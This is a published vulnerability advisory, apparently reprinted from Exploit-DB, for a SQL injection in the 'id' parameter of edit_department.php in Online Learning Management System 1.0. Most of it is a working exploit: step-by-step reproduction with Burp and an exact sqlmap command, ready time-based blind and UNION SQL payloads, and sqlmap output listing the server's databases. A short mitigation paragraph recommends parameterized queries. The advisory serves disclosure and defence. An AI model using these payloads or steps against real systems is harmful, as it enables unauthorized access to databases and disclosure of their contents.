Online Learning Management System 1.0 - 'id' SQL Injection

vendor:

Online Learning Management System

by:

Aakash Madaan (Godsky)

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: Online Learning Management System

Affected Version From: Version 1

Affected Version To: Version 1

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Parrot OS

2020

Online Learning Management System 1.0 – ‘id’ SQL Injection

A SQL Injection vulnerability exists in Online Learning Management System 1.0, which allows an attacker to inject malicious SQL queries via the 'id' parameter. By sending a specially crafted request to the 'edit_department.php' page, an attacker can use the sqlmap tool to inject malicious SQL queries and gain access to the database, leading to information disclosure.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL queries. Additionally, parameterized queries should be used to prevent SQL injection attacks.

Source

Exploit-DB raw data:

# Exploit Title:  Online Learning Management System 1.0 - 'id' SQL Injection
# Exploit Author: Aakash Madaan (Godsky)
# Date: 2020-12-22
# Vendor Homepage: https://www.sourcecodester.com/php/7339/learning-management-system.html
# Software Link: https://www.sourcecodester.com/download-code?nid=7339&title=Online+Learning+Management+System+using+PHP%2FMySQLi+with+Source+Code
# Affected Version: Version 1
# Category: Web Application
# Tested on: Parrot OS

Step 1. Login to the application with admin credentials

Step 2. Click on "Departments" page.

Step 3. Choose any event and select "edit". The url should be "http(s)://<host>/admin/edit_department.php?id=4"

Step 4. Capture the request to the "edit" event page in burpsuite.

Step 5. Save the captured request and run sqlmap on it using "sqlmap -r request --time-sec=5 --dbs

---
Parameter: id (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=4' AND (SELECT 7775 FROM (SELECT(SLEEP(5)))vwwE) AND
'OoVY'='OoVY

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: id=-9296' UNION ALL SELECT
NULL,NULL,CONCAT(0x716a707871,0x64766351487955536b5276427a5a416a764e6a4b46476a57704f6d73425368544153494e53525970,0x716a716a71)--
-
---
[16:01:08] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[16:01:08] [INFO] fetching database names
[16:01:12] [INFO] retrieved: 'information_schema'
[16:01:13] [INFO] retrieved: 'mysql'
[16:01:15] [INFO] retrieved: 'performance_schema'
[16:01:16] [INFO] retrieved: 'css'
[16:01:18] [INFO] retrieved: 'sales_inventory_db'
[16:01:19] [INFO] retrieved: 'rios_db'
[16:01:19] [INFO] retrieved: 'capstone'
available databases [7]:

[*] capstone
[*] css
[*] information_schema
[*] mysql
[*] performance_schema
[*] rios_db
[*] sales_inventory_db


Step 6. Sqlmap should inject the web-app successfully which leads to
information disclosure